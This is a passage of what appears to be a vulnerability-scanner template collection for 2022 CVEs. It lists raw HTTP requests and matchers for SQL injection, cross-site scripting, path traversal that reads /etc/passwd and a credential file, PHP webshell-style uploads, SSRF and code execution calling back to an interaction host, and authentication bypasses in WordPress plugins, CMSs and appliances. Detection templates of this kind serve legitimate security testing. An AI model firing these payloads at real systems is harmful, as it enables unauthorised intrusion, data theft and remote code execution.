HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/index.php?page=config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"site_title\"\n\n\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"forum_logo\"; filename=\"{{randstr}}.php\"\nContent-Type:  application/x-httpd-php\n\n<?php\n\necho md5('CVE-2022-31854');\n\n?>\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA\nContent-Disposition: form-data; name=\"CSRF_token\"\n\n{{csrf}}\n------WebKitFormBoundaryoLtdjuqj2ixPvBhA--\n","GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"a63fd49130de6406a66600cd8caa162f\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"CSRF_token\" value=\"([0-9a-zA-Z]+)\"/>"],"internal":true}]}]},{"id":"CVE-2022-23898","info":{"name":"MCMS 5.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /cms/content/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncategoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz\n"],"matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]}]}]},{"id":"CVE-2022-3768","info":{"name":"WordPress WPSmartContracts <1.3.12 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=5","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"Batch Mint NFTs\")"],"condition":"and"}]}]},{"id":"CVE-2022-33965","info":{"name":"WordPress Visitor Statistics <=5.7 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(5)+or+' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"regex","regex":["^1331' and sleep\\(5\\) or '$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0678","info":{"name":"Microweber <1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","content=\"Microweber\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-46443","info":{"name":"Bangresto - SQL Injection","severity":"high"},"requests":[{"raw":["POST /bangresto-main/staff/process.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /bangresto-main/staff/insertorder.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded;\n\nitemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-0234","info":{"name":"WordPress WOOCS < 1.3.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=woocs_get_products_price_html&woocs_in_order_currency=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","\"current_currency\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2373","info":{"name":"WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ssa/v1/users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["response_code\":200","\"email\":\"([a-zA-Z-_0-9@.]+)\",\"display_name\":\"([a-zA-Z-_0-9@.]+)\",\"gravatar_url\":\"http?:\\\\\\/\\\\\\/([a-z0-9A-Z.\\\\\\/?=&@_-]+)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36642","info":{"name":"Omnia MPX 1.5.0+r1 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd","{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["\"username\":","\"password\":","\"mustChangePwd\":","\"roleUser\":"],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-3982","info":{"name":"WordPress Booking Calendar <3.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------1cada150a8151a54\n\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"action\"\n\nwpdevart_form_ajax\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_id\"\n\nx\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_nonce\"\n\n{{nonce}}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_data\"\n\n{\"wpdevart-submit\":\"X\"}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart-submit\"\n\n1\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"CVE-2022-3982\"); ?>\n\n--------------------------1cada150a8151a54--\n","GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["var wpdevart.*\"ajaxNonce\":\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-33901","info":{"name":"WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0949","info":{"name":"WordPress Stop Bad Bots <6.930 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=0\n","@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))\n","GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"commentform\")"],"condition":"and"}]}]},{"id":"CVE-2022-47002","info":{"name":"Masa CMS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /index.cfm/_api/json/v1/{{siteid}}/content/?fields=lastupdatebyid HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/?muraAction=cEditProfile.edit HTTP/1.1\nHost: {{Hostname}}\nCookie: userid={{uuid}}; userhash=\n"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_3,\"\\\"userid\\\"\")"],"condition":"and"},{"type":"word","part":"body_3","words":["Edit Profile"]}],"extractors":[{"type":"regex","name":"siteid","group":1,"regex":["siteid:\"(.*?)\""],"internal":true,"part":"body"},{"type":"regex","name":"uuid","group":1,"regex":["\"lastupdatebyid\":\"([A-F0-9-]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-41441","info":{"name":"ReQlogic v11.3 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ProcessWait.aspx?POBatch=test&WaitDuration=</script><script>alert(document.domain)</script>","{{BaseURL}}/ProcessWait.aspx?POBatch=</script><script>alert(document.domain)</script>&WaitDuration=3"],"stop-at-first-match":true,"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\") && contains(body_2, \"POProcessTimeout\")"],"condition":"and"}]}]},{"id":"CVE-2022-45835","info":{"name":"WordPress PhonePe Payment Solutions <=1.0.15 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /?phonepe_action=curltestPhonePe&url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["cURL Test for PhonePe"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22963","info":{"name":"Spring Cloud - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /functionRouter HTTP/1.1\nHost: {{Hostname}}\nspring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\nContent-Type: application/x-www-form-urlencoded\n\n{{rand_base(8)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"],"condition":"or"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1910","info":{"name":"WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["widget-title\"><script>alert(document.domain)</script></h3>","aux-widget"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0781","info":{"name":"WordPress Nirweb Support <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=answerd_ticket&id_form=1 UNION ALL SELECT NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29775","info":{"name":"iSpy 7.2.2.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/logfile?d=crossdomain.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Log Start","Log File","iSpy"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42095","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save\n","POST /?q={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_5 == 200","contains(header_5, 'text/html')","contains(body_5, \"<img src=\\\"x\\\" onerror=\\\"alert(document.domain)\\\" />\")","contains(body_5, 'Backdrop CMS')"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-4057","info":{"name":"Autoptimize < 3.1.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html","{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Job id &lt;","log messages"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4447","info":{"name":"WordPress Fontsy <=1.8.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{{md5(num)}}\")"],"condition":"and"}]}]},{"id":"CVE-2022-24124","info":{"name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["XPATH syntax error.*&#39","casdoor"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0692","info":{"name":"Rudloff alltube prior to 3.0.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-2034","info":{"name":"WordPress Sensei LMS <4.5.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"],"payloads":{"num":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_message","guid\":{\"rendered\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0482","info":{"name":"Easy!Appointments <1.4.3 - Broken Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncsrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"appointments\":","\"unavailables\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","name":"csrf_token","internal":true,"kval":["csrfCookie"],"part":"header"}]}]},{"id":"CVE-2022-30512","info":{"name":"School Dormitory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Fatal error","Uncaught Error: Call to a member function fetch_assoc()","<th class=\"\">Month of</th>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34121","info":{"name":"CuppaCMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40881","info":{"name":"SolarView 6.00 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /network_test.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nhost=%0a{{cmd}}%0a&command=ping\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38794","info":{"name":"Zaver - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2599","info":{"name":"WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","GOTMLS_mt"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0189","info":{"name":"WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nid=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29298","info":{"name":"SolarView Compact 6.00 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24990","info":{"name":"TerraMaster TOS < 4.2.30 Server Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/api.php?mobile/webNasIPS"],"headers":{"User-Agent":"TNAS"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","TerraMaster"],"condition":"and"},{"type":"regex","part":"body","regex":["webNasIPS successful","(ADDR|(IFC|PWD|[DS]AT)):","\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27984","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmenu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"components/menu/classes/functions.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-0349","info":{"name":"WordPress NotificationX <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnx_id=sleep(6) -- x\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"data\\\":{\\\"success\\\":true}\")"],"condition":"and"}]}]},{"id":"CVE-2022-22972","info":{"name":"VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /vcac/ HTTP/1.1\nHost: {{Hostname}}\n","GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1\nHost: {{Hostname}}\n","POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1\nHost: {{interactsh-url}}\nContent-type: application/x-www-form-urlencoded\n\nprotected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["HZN="]},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"protected_state","group":1,"regex":["id=\"protected_state\" value=\"([a-zA-Z0-9]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"horizonRelayState","group":1,"regex":["name=\"horizonRelayState\" value=\"([a-z0-9-]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstore","group":1,"regex":["id=\"userstore\" value=\"([a-z.]+)\" \\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstoreDisplay","group":1,"regex":["id=\"userstoreDisplay\" readonly class=\"login-input transparent_class\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"regex","name":"stickyConnectorId","group":1,"regex":["name=\"stickyConnectorId\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"kval","name":"HZN-Cookie","kval":["HZN"],"part":"header"}]}]},{"id":"CVE-2022-0148","info":{"name":"WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`) x\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42096","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_tags[und]\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][summary]\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_1}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[date]\"\n\n2023-04-25\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"promote\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-24\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"comment\"\n\n2\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryIubltUxssi0yqDjp--\n","GET /?q=posts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" 